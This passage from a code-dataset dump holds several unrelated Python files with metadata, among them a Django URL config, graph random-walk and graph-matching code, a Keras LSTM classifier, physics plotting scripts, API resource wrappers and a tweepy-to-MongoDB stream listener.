'razon': cedula,\n 'monto': amount\n\n })\n else:\n info_data.append({\n 'validacion': 'False',\n })\n return info_data","sub_path":"3mit_precioaux_pos/models/funcion_call.py","file_name":"funcion_call.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"601856378","text":"from django.conf.urls.defaults import patterns, include, url\r\n#from django.contrib.staticfiles.urls import staticfiles_urlpatterns\r\n#from django.conf import settings\r\n\r\n\r\n# Uncomment the next two lines to enable the admin:\r\n# from django.contrib import admin\r\n# admin.autodiscover()\r\n\r\nurlpatterns = patterns('',\r\n # Examples:\r\n # url(r'^$', 'WWWDB.views.home', name='home'),\r\n # url(r'^WWWDB/', include('WWWDB.foo.urls')),\r\n\r\n # Uncomment the admin/doc line below to enable admin documentation:\r\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\r\n\r\n # Uncomment the next line to enable the admin:\r\n # url(r'^admin/', include(admin.site.urls)),\r\n \r\n url(r'^import/?', include('ImportLabData.urls')),\r\n url(r'^forms/', include('WebForms.urls')),\r\n url(r'^accounts/', include('Accounts.urls')),\r\n url(r'^export/', include('Export.urls')),\r\n #url(r'^static/(?P.*)$', 'django.views.static.serve', {\r\n #'document_root': settings.MEDIA_ROOT,\r\n #}),\r\n #url(r'^admin/', include(admin.site.urls)),\r\n)\r\n\r\n#urlpatterns += staticfiles_urlpatterns()\r\n","sub_path":"WWWDB/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"373534103","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 10 19:05:22 2020\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nimport random\r\nimport networkx as nx\r\nfrom collections import Counter\r\n\r\n# 实现walk功能的一个Graph类\r\nclass Graph:\r\n \r\n def __init__(self, data):\r\n self.G = self.load_data(data)\r\n self.mid_freq = self.freq(data)\r\n self.get_graph_info()\r\n \r\n \r\n def load_data(self,data):\r\n G = nx.DiGraph()\r\n for index in range(len(data)):\r\n for i in range(len(data[index][1])-1):\r\n l_node = data[index][1][i]\r\n r_node = data[index][1][i+1]\r\n if (l_node, r_node) in G.edges():\r\n G.add_edge(l_node, r_node, weight=G[l_node][r_node]['weight']+1)\r\n else:\r\n G.add_edge(l_node, r_node, weight=1)\r\n return G\r\n \r\n \r\n def freq(self,data):\r\n mid_freq = Counter()\r\n for i in range(len(data)):\r\n mid_freq.update(data[i][1])\r\n return mid_freq\r\n \r\n \r\n def get_graph_info(self):\r\n #nx.draw(G,with_labels=True)\r\n print('number of edges:', len(self.G.edges()))\r\n s = 0\r\n for u,v,d in self.G.edges(data = 'weight'):\r\n if d>1:\r\n s+=1\r\n print('number of edges with weight greater than 1:',s)\r\n print('number of edges:', len(self.G.edges()))\r\n print('number of nodes:', len(self.G.nodes()))\r\n #print(nx.adjacency_matrix(self.G))\r\n \r\n \r\n # weighted deep walk\r\n def random_walk(self, path_length, start=None):\r\n \"\"\" Returns a truncated random walk.\r\n path_length: Length of the random walk.\r\n start: the start node of the random walk.\r\n \"\"\"\r\n if start:\r\n path = [start]\r\n else:\r\n # starts from a random node if start is not defined\r\n path = [random.choice(list(self.G.nodes()))]\r\n \r\n while len(path) < path_length:\r\n neighbor_dict = self.G[str(path[-1])]\r\n if len(neighbor_dict.keys())!=0: # 有临近点的时候开始walk\r\n walk_list = [] # 将所有临近点根据weight全部保存进一个list,然后随机选择node作为一个walk\r\n for node,weight in neighbor_dict.items():\r\n for i in range(weight['weight']):\r\n walk_list.append(node)\r\n path.append(random.choice(walk_list)) #权重walk\r\n else: #无临近点直接退出\r\n break \r\n return path \r\n \r\n \r\n # node2vec walk\r\n def node2vec_walk(self, path_length, start=None):\r\n pass\r\n\r\n \r\n # num_paths:每个node走多少次\r\n # path_length:每次walk的长度\r\n def build_deepwalk_corpus(self, num_paths, path_length):\r\n \"\"\" Returns a corpus(list) from deep walk.\r\n num_paths: number of path every node walks\r\n path_length: maximum length of a path \r\n \"\"\"\r\n walks = []\r\n nodes = list(self.G.nodes())\r\n \r\n for cnt in range(num_paths):\r\n random.shuffle(nodes)\r\n for node in nodes:\r\n walks.append(self.random_walk(path_length, start=node))\r\n \r\n return walks\r\n\r\n ","sub_path":"deep_walk.py","file_name":"deep_walk.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"79415866","text":"from tkinter import *\n\nroot = Tk()\n\nphoto = PhotoImage(file='imgs/bg.png')\ntheLabel = Label(root,\n text='學習 Pytho 真好玩',\n justify=LEFT,\n image=photo,\n compound=CENTER,\n font=('標楷體', 20),\n fg='blue')\ntheLabel.pack()\n\nmainloop()\n","sub_path":"tkinter/tk4.py","file_name":"tk4.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"17920948","text":"from .mixins import AllMixin, CreateMixin, DeleteMixin, RetrieveMixin, UpdateMixin\n\n\nclass Resource:\n def __init__(self, base_api):\n self._base_api = base_api\n\n\nclass CustomerResource(AllMixin, CreateMixin, DeleteMixin, RetrieveMixin, UpdateMixin, Resource):\n _endpoint = 'customers'\n\n\nclass EventResource(AllMixin, RetrieveMixin, Resource):\n _endpoint = 'events'\n\n\nclass TransactionResource(AllMixin, CreateMixin, DeleteMixin, RetrieveMixin, Resource):\n _endpoint = 'transactions'\n\n def pay(self, object_id, **kwargs):\n params = kwargs.get('params', {})\n params['id'] = object_id\n kwargs['params'] = params\n return self._base_api.get(f'{self._endpoint}/pay', **kwargs)\n\n\nclass UserResource(AllMixin, UpdateMixin, DeleteMixin, Resource):\n _endpoint = 'accounts/users'\n\n\nclass AccountResource(AllMixin, CreateMixin, UpdateMixin, DeleteMixin, Resource):\n _endpoint = 'accounts'\n\n def current(self, object_id, **kwargs):\n return self._base_api.put(f'{self._endpoint}/current/{object_id}', data=None, **kwargs)\n\n\nclass SettingsResource(AllMixin, Resource):\n _endpoint = 'settings'\n\n\nclass AccountSettingsResource(AllMixin, CreateMixin, Resource):\n _endpoint = 'account_settings'\n\n\nclass RoleResource(AllMixin, Resource):\n _endpoint = 'roles'\n\n\nclass LogResource(AllMixin, RetrieveMixin, Resource):\n _endpoint = 'logs'\n\n\nclass PayoutResource(CreateMixin, RetrieveMixin, Resource):\n _endpoint = 'payouts'\n\n def schedule(self, data, **kwargs):\n return self._base_api.post(f'{self._endpoint}/start', data, **kwargs)\n","sub_path":"fedapay/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"132986382","text":"import sys\nsys.path.append(\"/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages\")\nimport pickle\nimport numpy as np\nimport networkx as nx\nfrom time import time\nfrom scipy.sparse import coo_matrix, identity\n\n\nMAX_GRAPH_DISTANCE_RATIO = 1 / 3\nTOPK_LIST = [1, 2, 5, 10, 20, 50, 100]\n\n\ndef build_graph(path):\n print('building KG...')\n kg = nx.DiGraph()\n for line in open(path, 'r'):\n h, r, t = line.strip().split('\\t')\n kg.add_edge(int(h), int(t), edge_type=int(r))\n return kg\n\n\ndef get_dicts(kg):\n print('calculating dicts...')\n\n node2neighbor_num = dict()\n node2degree = dict()\n node2neighbor_edge_num = dict()\n\n for node in kg.nodes:\n neighbors = set(kg.predecessors(node)) | set(kg.successors(node))\n n_neighbors = len(neighbors)\n node2neighbor_num[node] = n_neighbors\n\n degree = kg.degree(node)\n node2degree[node] = degree\n\n subgraph = kg.subgraph(neighbors)\n n_neighbor_edges = len(subgraph.edges)\n node2neighbor_edge_num[node] = n_neighbor_edges\n\n return node2neighbor_num, node2degree, node2neighbor_edge_num\n\n\ndef construct_local_subgraph(query_node, kg):\n subgraph = kg.subgraph(set(kg.predecessors(query_node)) | set(kg.successors(query_node)) | {query_node})\n\n # the center node (query node) is always mapped to 0 in the relabeled query graph\n node_mapping = {query_node: 0}\n for n in subgraph.nodes:\n if n != query_node:\n node_mapping[n] = len(node_mapping)\n\n subgraph_relabeled = nx.DiGraph()\n for e in subgraph.edges:\n subgraph_relabeled.add_edge(node_mapping[e[0]],\n node_mapping[e[1]],\n edge_type=subgraph.get_edge_data(e[0], e[1])['edge_type'])\n\n return subgraph_relabeled\n\n\ndef calculate_assignment_matrix(query_graph, kg):\n A = get_affinity_matrix(query_graph, kg)\n x = np.ones([A.shape[0], 1], dtype=np.float) / A.shape[0]\n while True:\n next_x = A.dot(x)\n next_x /= np.linalg.norm(next_x)\n if np.linalg.norm(next_x - x) < 0.01:\n break\n x = next_x\n\n x = x.reshape([len(query_graph.nodes), len(kg.nodes)])\n return x\n\n\n# A_{ia; jb} = s_E(e_{ij}, e'_{ab})\ndef get_affinity_matrix(query_graph, kg):\n n = len(query_graph.nodes)\n m = len(kg.nodes)\n\n row = []\n col = []\n data = []\n for query_edge in query_graph.edges:\n for kg_edge in kg.edges:\n i = query_edge[0]\n j = query_edge[1]\n a = kg_edge[0]\n b = kg_edge[1]\n ia = i * m + a\n jb = j * m + b\n e_ij = query_graph.get_edge_data(i, j)['edge_type']\n e_ab = kg.get_edge_data(a, b)['edge_type']\n if e_ij == e_ab:\n row.append(ia)\n col.append(jb)\n data.append(1)\n\n A = coo_matrix((data, (row, col)), shape=(n * m, n * m))\n A += identity(n * m)\n\n return A\n\n\ndef main():\n kg = build_graph('triplets.txt')\n ground_truth = pickle.load(open('ground_truth.pkl', 'rb'))\n node2neighbor_num, node2degree, node2neighbor_edge_num = get_dicts(kg)\n\n precision_list = []\n recall_list = []\n\n for i, q in enumerate(ground_truth.keys()):\n print('%d / %d' % (i, len(ground_truth)))\n\n query_graph = construct_local_subgraph(q, kg)\n x = calculate_assignment_matrix(query_graph, kg)\n\n scores = dict()\n for n in range(len(kg.nodes)):\n if n == q:\n continue\n if node2neighbor_num[n] != node2neighbor_num[q]:\n continue\n if abs(node2degree[n] - node2degree[q]) + abs(node2neighbor_edge_num[n] - node2neighbor_edge_num[q]) \\\n > MAX_GRAPH_DISTANCE_RATIO * len(query_graph.edges):\n continue\n scores[n] = x[0][n]\n sorted_res = [i[0] for i in sorted(scores.items(), key=lambda item: -item[1])]\n\n precision = []\n recall = []\n for k in TOPK_LIST:\n n_hit = len(set(sorted_res[0:k]) & set(ground_truth[q]))\n precision.append(n_hit / k)\n recall.append(n_hit / len(ground_truth[q]))\n\n precision_list.append(precision)\n recall_list.append(recall)\n\n avg_precision = np.average(np.array(precision_list), axis=0)\n avg_recall = np.average(np.array(recall_list), axis=0)\n\n np.set_printoptions(precision=3)\n print('\\nk =', TOPK_LIST)\n print('precision@k:', avg_precision)\n print('recall@k:', avg_recall)\n\n\nif __name__ == '__main__':\n t = time()\n main()\n print('time: %.1f s' % (time() - t))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"295566438","text":"\n\nfrom xai.brain.wordbase.verbs._shim import _SHIM\n\n#calss header\nclass _SHIMS(_SHIM, ):\n\tdef __init__(self,): \n\t\t_SHIM.__init__(self)\n\t\tself.name = \"SHIMS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"shim\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_shims.py","file_name":"_shims.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"258770480","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 9 19:56:16 2018\n\n@author: gbaechle\n\"\"\"\n\nimport numpy as np\nimport scipy as sp\nimport scipy.stats\nfrom scipy.special import erfc\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom scipy.optimize import least_squares\n\nimport seabornstyle as snsty\n\nimport sys\nsys.path.append(\"../\")\nfrom lippmann import *\n#from finite_depth_analysis import *\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\n\nplt.close('all')\nfig_path = 'PNAS/'\n\n\ndef plot_pipeline(N=500):\n \n Z = 5E-6\n r = 0.8\n t = 0.\n \n lambdas, omegas = generate_wavelengths(N) #3000\n depths = np.linspace(0,Z*(1-1/N),N)\n # depths = generate_depths(max_depth=5E-6)\n omegas = 2 * np.pi * c / lambdas \n \n spectrum = generate_gaussian_spectrum(lambdas=lambdas, mu=530E-9, sigma=20E-9) + generate_gaussian_spectrum(lambdas=lambdas, mu=460E-9, sigma=40E-9) + 0.7*generate_gaussian_spectrum(lambdas=lambdas, mu=650E-9, sigma=55E-9) \n spectrum = generate_mono_spectrum(lambdas=lambdas, color=530E-9) \n lippmann_complex = lippmann_transform_complex(lambdas, spectrum, depths, r=r, t=t)\n lippmann_no_window = lippmann_transform(lambdas, spectrum, depths, r=r)[0] \n \n window = (np.cos(np.linspace(0, np.pi, len(depths)))+1)/2\n# window = np.linspace(1,0, len(depths))\n# window = np.exp(np.linspace(0, -7, len(depths)))\n window = erfc(np.linspace(0,0.5,len(depths))) \n# window = np.ones(len(depths))\n lippmann = lippmann_no_window*window\n \n spectrum_reconstructed_complex = inverse_lippmann(lippmann, lambdas, depths, return_intensity=False)\n spectrum_reconstructed = np.abs(spectrum_reconstructed_complex)**2\n \n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_spectrum(lambdas, spectrum, ax=plt.gca()) \n plt.gca().set_yticks([0])\n plt.savefig(fig_path + 'original.pdf')\n plt.title('original spectrum') \n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_lippmann_transform(depths, lippmann_complex, ax=plt.gca(), complex_valued=True)\n plt.gca().axhline(y=0, color='k', zorder=-10, lw=0.5)\n plt.savefig(fig_path + 'lippmann_complex.pdf')\n plt.title('Lippmann transform (complex)') \n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_lippmann_transform(depths, lippmann_no_window, ax=plt.gca()) \n plt.gca().set_yticks([0])\n plt.savefig(fig_path + 'plate_density.pdf')\n plt.title('Lippmann transform')\n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_lippmann_transform(depths, lippmann, ax=plt.gca()) \n plt.gca().set_yticks([0])\n plt.savefig(fig_path + 'plate_density_windowed.pdf')\n plt.title('Lippmann transform windowed')\n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_spectrum(lambdas, np.real(spectrum_reconstructed_complex), ax=plt.gca())\n plt.gca().plot(lambdas*1E9, np.imag(spectrum_reconstructed_complex), c='0.7', zorder=-2)\n plt.gca().set_ylim(-1.1*np.max(np.abs(spectrum_reconstructed_complex)), 1.1*np.max(np.abs(spectrum_reconstructed_complex)))\n plt.gca().axhline(y=0, color='k', zorder=-10, lw=0.5)\n plt.gca().set_yticks([0])\n plt.savefig(fig_path + 'replay_complex.pdf')\n plt.title('spectrum replayed (complex)') \n \n plt.figure(figsize=(3.42/3, 3.42/3))\n show_spectrum(lambdas, spectrum_reconstructed, ax=plt.gca()) \n plt.gca().set_yticks([0])\n plt.savefig(fig_path + 'replay.pdf')\n plt.title('spectrum replayed') \n \n f, axes = plt.subplots(1, 5, figsize=(3.45/0.5*1.4, 3.45/4.6/0.5*1.4))\n show_spectrum(lambdas, spectrum, ax=axes[0], short_display=True)\n axes[0].set_yticks([0])\n# axes[0].set_xticklabels([400, '$\\lambda~(nm)$', 700])\n show_lippmann_transform(depths, lippmann_no_window, ax=axes[1], short_display=True)\n axes[1].axhline(y=0, color='k', zorder=-10, lw=0.5)\n show_lippmann_transform(depths, lippmann, ax=axes[2], short_display=True)\n axes[2].axhline(y=0, color='k', zorder=-10, lw=0.5)\n show_spectrum(lambdas, np.real(spectrum_reconstructed_complex), ax=axes[3], short_display=True)\n axes[3].plot(lambdas*1E9, np.imag(spectrum_reconstructed_complex), c='0.7', zorder=-2)\n axes[3].set_ylim(-1.1*np.max(np.abs(spectrum_reconstructed_complex)), 1.1*np.max(np.abs(spectrum_reconstructed_complex)))\n axes[3].axhline(y=0, color='k', zorder=-10, lw=0.5)\n axes[3].set_yticks([0])\n# axes[3].set_xticklabels([400, '$\\lambda~(nm)$', 700])\n show_spectrum(lambdas, spectrum_reconstructed, ax=axes[4], short_display=True) \n axes[4].set_yticks([0])\n# axes[4].set_xticklabels([400, '$\\lambda~(nm)$', 700])\n \n axes[0].set_title('(a) Original spectrum')\n axes[1].set_title('(b) Intensity of interferences')\n axes[2].set_title('(c) Silver density')\n axes[3].set_title('(d) Complex wavefunction')\n axes[4].set_title('(e) Replayed intensity')\n plt.savefig(fig_path + 'pipeline.pdf')\n \n \n \ndef plot_sinewaves(N=500, periods=3):\n \n t = np.linspace(0,2*periods*np.pi,N)\n t2 = np.linspace(0,2*periods*np.pi,10*N)\n wave = np.sin(t)\n \n plt.figure(figsize=(10,2))\n plt.plot(t, wave, color='#4FAADF')\n plt.ylim([-1.2, 1.2])\n plt.savefig('scalar_field.pdf')\n \n plt.figure(figsize=(10, 2))\n stem_with_color(t, wave-0.05, plt.gca(), color='#4FAADF', pos=True)\n stem_with_color(t, wave+0.05, plt.gca(), color='#4FAADF', pos=False)\n plt.plot(t2, np.sin(t2), color='k') \n plt.ylim([-1.2, 1.2])\n plt.savefig('vector_field.pdf')\n\ndef stem_with_color(x, y, ax, color, pos=True):\n \n if pos:\n marker = '^'\n x_ = x[y >= 0]\n y_ = y[y >= 0]\n else:\n marker = 'v'\n x_ = x[y < 0]\n y_ = y[y < 0]\n \n (markerline, stemlines, baseline) = plt.stem(x_, y_, markerfmt=marker)\n plt.setp(baseline, visible=False)\n plt.setp(markerline, color=color)\n plt.setp(stemlines, color=color)\n \ndef plot_interferences(N=2000):\n \n L = 200\n X, Y = np.meshgrid(np.linspace(0, L, N), np.linspace(-L/2, L/2, N))\n \n x1, y1 = 0, L/4\n x2, y2 = 0, -L/4\n patterns = np.sin(np.sqrt((X-x1)**2 + (Y-y1)**2)) + np.sin(np.sqrt((X-x2)**2 + (Y-y2)**2))\n \n patterns = np.c_[np.sin(X[:,:N//4])[::-1, :], patterns]\n \n plt.figure(figsize=(10, 5))\n plt.imshow(patterns, cmap=plt.cm.Blues_r)\n plt.axis('off')\n plt.savefig('patterns.pdf')\n \n plt.figure(figsize=(5, 5))\n plt.imshow(patterns[:, -1].reshape(-1,1), cmap=plt.cm.Blues_r, aspect=1/200)\n plt.axis('off')\n plt.savefig('screen.pdf')\n \n \ndef plot_filter(N=1000, Z=5E-6):\n c = 299792458/1.5\n lambdas, omegas = generate_wavelengths(N=N, c=c)\n\n #plot filter\n plt.figure(figsize=(3.45*1.4, 1.7*1.4))\n# plt.figure()\n fda.plot_h( lambdas, fda.s_z_tilde(Z, 2*np.pi*c/550E-9 -omegas), ax=plt.gca() )\n plt.savefig(fig_path + 's_z_tilde.pdf') \n \n\n \n \nif __name__ == '__main__':\n \n plot_pipeline()\n# plot_sinewaves(N=60)\n# plot_interferences()\n# plot_filter()\n \n \n","sub_path":"pnas.py","file_name":"pnas.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"471212925","text":"import numpy as np\nfrom numba import jit, prange\n\nresult = np.zeros(2000)\nresult2 = np.zeros(2000)\na = (2048, 2048)\nvalues = np.random.random(a)\nxy = np.random.randint(0, 2000, a)\n\n\ndef run():\n for i in np.unique(xy):\n result2[i] = np.max(values[xy == i])\n\n#@jit(nopython=True, parallel=True)\ndef inner(result, vfs, h):\n i = 0\n for j in prange(len(h)):\n k = h[j]\n result[j] = np.max(vfs[i:i+k])\n i += k\n\n\n#@jit(nopython=True, nogil=True)\ndef run_sort(xy, result, values):\n xf = xy.flatten()\n vf = values.flatten()\n idx = xf.argsort()\n \n vfs = vf[idx]\n\n h = np.bincount(xf)\n inner(result, vfs, h)\n\n","sub_path":"examples/hist_test.py","file_name":"hist_test.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"380136611","text":"import numpy as np\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense ,Activation,Masking,LSTM,Dropout\nfrom keras.optimizers import Adam\nfrom keras.preprocessing import sequence\nimport matplotlib.pyplot as plt\n\n#数据处理\n# x_shape(50,10x100),y_shape(2)\nX_data_path = '/home/cao/github_repository/LSTM+GAN/data/train/x_train.txt'\nY_data_path = '/home/cao/github_repository/LSTM+GAN/data/train/y_train.txt'\n#读取文件数据\ntemp_x = []\n# s_len = 0\ndef get_batch_data(file_path):\n\n fr = open(file_path,'r')\n num_lines = fr.readlines()\n # s_len = len(num_lines[0])\n fr.close()\n fw = open(file_path,'w')\n for eachlines in num_lines:\n fw.writelines(eachlines)\n temp_x.append(eachlines.split(' '))\n fw.close()\n return temp_x ,len(num_lines) # ,s_len\n\nx_train ,num_l = get_batch_data(X_data_path)\n\ntemp_y = []\ndef y_label(file):\n fr = open(file,'r')\n label = fr.readlines()\n fr.close()\n fw = open(file,'w')\n for c in label:\n fw.writelines(c)\n temp_y.append(c)\n fw.close()\n return temp_y\n\ny_train = y_label(Y_data_path)\n\n#数据处理成定长,补充value = -1\nx_train = sequence.pad_sequences(x_train,maxlen = 100,padding = 'post',value=-1)\n\n#取0.9%为训练数据,另外的为测试数据\nnum = int(0.9*num_l)\nx_train = np.array(x_train).astype(float)\ny_train = np.array(y_train).astype(float)\nx_train = np.reshape(x_train,(x_train.shape[0],x_train.shape[1],1))\nx_test = x_train[num:]\ny_test = y_train[num:]\nx_train = x_train[:num]\ny_train = y_train[:num]\ny_train = np_utils.to_categorical(y_train,num_classes =2)\ny_test = np_utils.to_categorical(y_test,num_classes = 2)\n\nprint(' num_l: ',num_l,'\\n','num: ',num ,'\\n','x_train:\\n ',x_train,'\\n','y_train:\\n ', y_train,'\\n','x_test',x_test,'\\n','y_test: ',y_test)\nprint(' x_train type:',type(x_train),'shape:',x_train.shape,'\\n','y_train type:',type(y_train),'shape:',y_train.shape)\n\n#搭建网络\nbatch_index = 0\ntime_step = len(x_train[0]) #100\ninput_dim =1 #每个词的维度\ninput_length = len(x_train) #10\noutput_size = 2\ncell_size = 32 #hidden_unit数量\nbatch_size = 9 #每批次训练多少条数据\nlr = 0.006\nepochs = 6\nhidenfeatrue = 32\n\nmodel = Sequential()\nmodel.add(Masking(mask_value= -1,input_shape=(time_step ,input_dim))) #model.add(Masking(mask_value=0., input_shape=(timesteps, features)))\n#build a LSTm RNN\nmodel.add(LSTM(\n batch_input_shape=(None,x_train.shape[1], x_train.shape[2]),\n output_dim=cell_size,\n return_sequences = False))\n\n# model.add(LSTM(hidenfeatrue, input_shape=(time_step, input_length)))\nmodel.add(Dropout(0.5))\n\n#add output layer\nmodel.add(Dense(output_size))\nmodel.add(Activation('softmax'))\n\n#优化\nadam = Adam(lr)\n\n#add metric to get more results you want to see\nmodel.compile(\n optimizer=adam,\n loss='binary_crossentropy',\n metrics=['accuracy'],\n)\nprint('\\n Training --------------')\nmodel.summary()\nhistory = model.fit(x_train, y_train, epochs=epochs, batch_size=batch_size,validation_data=(x_test,y_test))\nnp.savetxt('train_loss.txt', history.history['loss'])\nnp.savetxt('train_acc.txt', history.history['acc'])\n\nplt.plot(np.loadtxt('train_loss.txt'), color='blue', label='train_loss')\nplt.plot(np.loadtxt('train_acc.txt'), color='green', label='train_acc')\nplt.legend(loc='best')\nplt.show()\nprint('\\n Test ------------------')\nfor step in range(100):\n if step % 20 == 0:\n loss ,accuarcy = model.evaluate(x_test , y_test)\n\n print('test_loss: ',loss)\n print('accuarcy: ',accuarcy)\n","sub_path":"kears_classifier.py","file_name":"kears_classifier.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"640319173","text":"from typing import Type, Union\n\nfrom .constants import PREFIX_SEP\nfrom .meta_base import ColMeta\nfrom .util import camel_to_snake\n\n\nclass ColAccessor(metaclass=ColMeta):\n \"\"\"describe and access raw columns\n\n useful for\n - getting column names from static analysis\n - documenting types\n - dry describing nested structures\n\n e. g.\n\n class LocationCols(ColAccessor):\n lon = float\n lat = float\n\n class TableCols(ColAccessor):\n col1 = int\n col2 = str\n foreign_key1 = \"name_of_key\"\n\n class NestedCols(ColAccessor):\n s = str\n x = float\n\n start_loc = LocationCols\n end_loc = LocationCols\n\n >>> TableCols.start_loc.lat\n 'start_loc__lat'\n\n \"\"\"\n\n\nclass ColAssigner(ColAccessor):\n \"\"\"define functions that create columns in a dataframe\n\n later the class attributes can be used to access the column\n can be used to created nested structures of columns\n\n either by assigning or inheriting within:\n\n class MyStaticChildAssigner(ColAssigner):\n\n pass\n\n class MyAssigner(ColAssigner):\n\n class MySubAssigner(ColAssigner):\n pass\n\n chass1 = MyStaticChildAssigner\n \"\"\"\n\n def __call__(self, df, carried_prefixes=()):\n # dir() is alphabetised object.__dir__ is not\n # important here if assigned cols rely on each other\n for attid in self.__dir__():\n if attid.startswith(\"_\"):\n continue\n att = getattr(self, attid)\n new_pref_arr = (*carried_prefixes, camel_to_snake(attid))\n if isinstance(att, ColMeta):\n if ChildColAssigner in att.mro():\n inst = att(df, self)\n else:\n inst = att()\n df = inst(df, carried_prefixes=new_pref_arr)\n elif callable(att):\n colname = PREFIX_SEP.join(new_pref_arr)\n df = df.assign(**{colname: self._call_att(att, df)})\n return df\n\n @staticmethod\n def _call_att(att, df):\n return att(df)\n\n\nclass ChildColAssigner(ColAssigner):\n \"\"\"assigner specifically for nested structures\n\n methods of these are not called with parameters\n\n the dataframe and the parent assigner are passed\n to the __init__ method as parameters\n \"\"\"\n\n def __init__(self, df, parent_assigner: ColAssigner) -> None:\n pass\n\n @staticmethod\n def _call_att(att, _):\n return att()\n\n\ndef get_all_cols(cls: Union[Type[ColAccessor], Type[ColAssigner]]):\n \"\"\"returns a list of strings of all columns given by the type\n\n can also be used for nested structues of columns\n \"\"\"\n out = []\n for attid in dir(cls):\n if attid.startswith(\"_\"):\n continue\n attval = getattr(cls, attid)\n if isinstance(attval, type) and any(\n [kls in attval.mro() for kls in [ColAccessor, ColAssigner]]\n ):\n out += get_all_cols(attval)\n continue\n if ColAccessor in cls.mro():\n out.append(attval)\n return out\n\n\ndef get_att_value(accessor: Type[ColAccessor], attname: str):\n \"\"\"get the true assigned value for the class attribute\"\"\"\n return accessor.__getcoltype__(attname)\n","sub_path":"colassigner/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"32392341","text":"import tweepy\nimport json\nfrom oauth import *\nfrom mongo_config import *\nfrom pymongo import MongoClient\n \n\n #This module is just for querying all the json that the standard twitter API returns to me.\n \n \ntags=['#openbanking','#apifirst','#devops','#cloudfirst','#microservices','#apigateway','#oauth', '#swagger','#raml','#openapis']\n\nclass StreamListener(tweepy.StreamListener): \n #This is a class provided by tweepy to access the Twitter Streaming API. \n \n def on_connect(self):\n # Called initially to connect to the Streaming API\n print(\"You are now connected to the streaming API.\")\n \n def on_error(self, status_code):\n # On error - if an error occurs, display the error / status code\n print('An Error has occured: ' + repr(status_code))\n return False\n \n def on_data(self, data):\n #This is the meat of the script...it connects to your mongoDB and stores the tweet\n try:\n \n # Decode the JSON from Twitter\n datajson = json.loads(data)\n \n #grab the 'created_at' data from the Tweet to use for display\n created_at = datajson['created_at']\n \n #print out a message to the screen that we have collected a tweet\n print(\"Tweet collected at \" + str(created_at))\n \n #insert the data into the mongoDB into a collection called twitter_search\n #if twitter_search doesn't exist, it will be created.\n db.twitter_search.insert(datajson)\n except Exception as e:\n print(e)\n \n\nlistener = StreamListener(api=tweepy.API(wait_on_rate_limit=True)) \nstreamer = tweepy.Stream(auth=auth, listener=listener)\nprint(\"Tracking: \" + str(tags))\nstreamer.filter(track=tags)","sub_path":"test/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"201464391","text":"def solution(A):\n \"\"\"\n Problem Statement: https://app.codility.com/programmers/lessons/2-arrays/odd_occurrences_in_array/\n \"\"\"\n result = 0\n for number in A:\n result ^= number\n return result\n\n\nif __name__ == '__main__':\n assert solution([9, 3, 9, 3, 9, 7, 9]) == 7\n assert solution([1]) == 1\n","sub_path":"codility/arrays/odd_occurrences_in_array.py","file_name":"odd_occurrences_in_array.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"104785948","text":"\"\"\"\nBuild dictionary for Inverted Index, store in Memory\nAuthor:Bo\n\"\"\"\nfrom __init__ import *\n\nclass Dictionary:\n def __init__(self):\n self.fw = FileWriter()\n self.fr = FileReader()\n self.punc = string.punctuation\n\n def get_terms(self):\n \"\"\"Get questions one by one, generate (termID, docID, termFrequency) dictionary for each question\n \"\"\"\n with Conn(database = conf.DB_NAME, host=conf.IP, port=conf.PORT, collection=conf.COL_NAME) as col:\n cursor = col.find()\n doc_json = []\n for doc in cursor:\n #current question\n doc_terms = []\n doc_id = str(doc['_id'])\n doc_tit = doc['question']['title'][0].split()\n doc_des=[]\n if len(doc_des)>0:\n doc_des = doc['question']['description'][0].split()\n doc_tag = doc['question']['tags']\n #to lower,digit and remove punc \n doc_tit = 